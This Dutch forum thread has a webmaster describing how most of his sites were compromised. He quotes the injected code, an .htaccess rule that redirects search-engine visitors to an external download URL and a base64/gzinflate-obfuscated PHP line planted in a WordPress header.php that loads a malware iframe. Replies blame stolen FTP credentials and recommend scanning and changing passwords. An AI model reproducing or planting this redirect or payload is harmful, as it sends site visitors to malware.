bijna al mijn sites gehackt

Status
Niet open voor verdere reacties.

Baljuin

Gebruiker
Lid geworden
28 aug 2008
Berichten
50
Dag,

Gisteren ben ik aangevallen door een hacker op verschillende websites door mij gemaakt.

De websites staan bij 3 verschillende providers.
De hacker stopt in de .htaccess en in header.php van mijn wordpress theme een regel code.

In het .htaccess bestand stond het volgende:
Code:
#c3284d#
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|about|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|blog|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditireland|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|galaxy|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)
RewriteRule ^(.*)$ http://pahgawks.com/download/stats.php [R=301,L]
</IfModule>
#/c3284d#

En in header.php dit:
PHP:
#c3284d#
echo(gzinflate(base64_decode("JY5BDsIgFET3TXoH8jfqpiQuFXoKL/AFBJQCgV/R20vtbvKSNzOiquIzMfpmI4HMh/gT37hTmMdBJ7UuJtLUiidzPAj/KLgYVouS4IjyhfOMzmJ71UmlhevUYkioeSWkOmWXgcVuSLg1T2QKsN6eQvDRSsCVErB/5T0VbYqE2AEGb6ME1Yc3wRlvHUk4A2tek9vSLPh+ZT6cruMg+P55/gE=")));
#/c3284d#

Deze regel zorgt voor een iframe die verwijst naar een website. 3x linkte deze regel naar een website van een persoon die zelf ook slachtoffer is geweest en de overige keren verwees de iframe naar malware sites.

Daarnaast zag ik ook dat op 1 website, die niet op wordpress draait, ook was geinfecteerd. Deze website was slechts 1 simpele html pagina, zonder php.

Ik heb nu inmiddels al mijn code opgeschoond en de malware is weg. Maar toch ben ik ongerust. De hacker heeft al mijn sites (op 1 na) gehackt. De sites hebben totaal geen verband met elkaar, draaien op verschillende servers van verschillende providers. 1 site staat nog niet eens in de Google index, want die is niet af.

Mijn vraag is dan: Hoe komt het dat al mijn sites gehackt zijn? Is dit slechts toeval of weet de hacker iets van mij?
 
Jep ik heb dit ook gehad, zeer irritant want virusbeveiliging begint met het blocken van je sites. Volgensmij komt het door malware op de pc waarmee je upload, want die heb ik geformatteerd en daarna nooit weer last gehad. Ik kan er naast zitten maar dat was mijn situatie.
 
Je bedoelt dat je schadelijke software op je computer had staan?

Ik gebruik filezilla, dat is geen malware. Ik ben nu wel mijn pc aan het scannen op malware. Las ergens dat dat het idd kan zijn
 
Ja exact: Ik gebruikte destijds ook filezilla(niet dat het daaraan ligt), maar het lijkt erop dat je malware op de computer hebt waarmee je upload. Die malware geeft steeds die code aan je .htaccess bij de upload. Wat het probleem dus hierbij is is dat bezoekers ten eerste misschien kunnen worden doorgelinkt naar andere sites, ten tweede als bezoekers een goed beveiligspakket hebben word je hele site gewoon geblokkeerd vanwege malicious activity.

Wat ik ook merkte als bewijs nog is dat toen ik van mijn ene pc uploade, had ik het probleem wel, van mijn andere pc had ik het probleem niet. Dus gewoon goed scannen eerst zou ik zeggen.
 
Ik heb het nog even nagekeken. Ik heb een maandje of 2-3 geleden mijn pc opnieuw geinstalleerd wegens een nieuwe hdd. Ik zie nu dat alle websites waarvan ik toen ftp gegevens op de pc had staan zijn gehackt. Want van de ene site die niet gehackt is had ik toen nog geen ftp gegevens op de hdd staan. En 1 site die wel gehackt is, daarvan had ik toen wel de ftpgegevens op de pc staan, maar na de herinstallatie niet meer. Ik vermoed dus dat mijn pc was geïnfecteerd voor de herinstallatie.

De geinfecteerde bestanden zijn namelijk allemaal gewijzigd op momenten dat mijn pc niet aanstond. Wellicht heeft de hacker mijn passwords gelogt en er deze maand iets mee gedaan...
 
Laatst bewerkt:
Dat zou dan heel goed kunnen als je het zo zegt. Probeer inderdaad te uploaden, of via andere pc's te uploaden en kijk of het probleem zich ook voordoet. Dan kun je makkelijk conclusies trekken. Maar wie weet heb je gelijk en is het al opgelost.
 
Ok, even een

TIP:

Je mag geen .htaccess maken zonder toestemming van je hoster...
 
Laatst bewerkt:
Onzin. Kan zijn dat er hosters zijn met zo'n regel (belachelijk, maar goed) maar het is zeker geen vaste regel.

@Baljiun, vergeet niet om voor iedere ftp account een nieuw wachtwoord aan te maken, en voor elke site een andere zodat het minder makkelijk gebeurt dat op al je sites wordt ingebroken. Voor zover je dat nog niet gedaan hebt moet je natuurlijk ook even je PC scannen om mogelijke malware te verwijderen, Malwarebytes is hier vrij goed voor, en een virusscanner installeren.
 
Laatst bewerkt:
Dag Naarling,

Ik heb alles meteen gedaan toen ik erachter dat ik gehackt was. Volvogangster bracht me op het idee dat het weleens een lokaal (op mijn pc) probleem kon zijn. Alles is weer schoon en alle wachtwoorden zijn veranderd.

Iedereen bedankt voor het meedenken!
 
Ja maar als iedereen die malware op zijn pc zou doen aangifte doet dan hebben we een probleem.
 
Status
Niet open voor verdere reacties.

Nieuwste berichten

Terug
Bovenaan Onderaan